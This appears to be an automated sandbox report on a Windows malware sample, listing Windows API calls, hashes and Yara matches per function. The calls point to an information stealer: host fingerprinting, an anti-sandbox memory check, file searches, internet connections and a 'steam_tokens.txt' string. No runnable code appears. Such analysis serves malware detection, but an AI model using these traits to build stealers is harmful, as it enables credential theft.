                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4291168024-0
                                                                                                                                                        • Opcode ID: 83eff77de84138ae98fd8d093eae53c16616053155ab01ad62200b34594ec208
                                                                                                                                                        • Instruction ID: d9457ad3a7009fcc1309fe843cea7b45ec6125952af33c83733dd7c1acbf35a9
                                                                                                                                                        • Opcode Fuzzy Hash: 83eff77de84138ae98fd8d093eae53c16616053155ab01ad62200b34594ec208
                                                                                                                                                        • Instruction Fuzzy Hash: 32F0F932D217489ACA24EFB4A8423A6BF6CAF6B114F505729EC4457151FF20E1D4C386
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3183270410-0
                                                                                                                                                        • Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                        • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                        • Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                        • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4203777966-0
                                                                                                                                                        • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                        • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                        • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                        • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1103761159-0
                                                                                                                                                        • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                        • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                        • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                        • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                          • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                          • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                        • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3409980764-0
                                                                                                                                                        • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                        • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                                                                        • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                        • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A
                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$lstrcpy$InternetOpen
                                                                                                                                                        • String ID: steam_tokens.txt
                                                                                                                                                        • API String ID: 2934705399-401951677
                                                                                                                                                        • Opcode ID: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
                                                                                                                                                        • Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
                                                                                                                                                        • Opcode Fuzzy Hash: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
                                                                                                                                                        • Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                        • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                        • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                        • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                        • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 574041509-0
                                                                                                                                                        • Opcode ID: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
                                                                                                                                                        • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                                                                        • Opcode Fuzzy Hash: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
                                                                                                                                                        • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3635112192-0
                                                                                                                                                        • Opcode ID: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
                                                                                                                                                        • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                                                                        • Opcode Fuzzy Hash: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
                                                                                                                                                        • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3635112192-0
                                                                                                                                                        • Opcode ID: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
                                                                                                                                                        • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                        • Opcode Fuzzy Hash: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
                                                                                                                                                        • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                        • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                        • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                        • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                        • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                        • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                        • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                        • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00412ABA
                                                                                                                                                        • lstrcat.KERNEL32(?,04338740), ref: 00412AD8
                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2699682494-0
                                                                                                                                                        • Opcode ID: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
                                                                                                                                                        • Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
                                                                                                                                                        • Opcode Fuzzy Hash: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
                                                                                                                                                        • Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
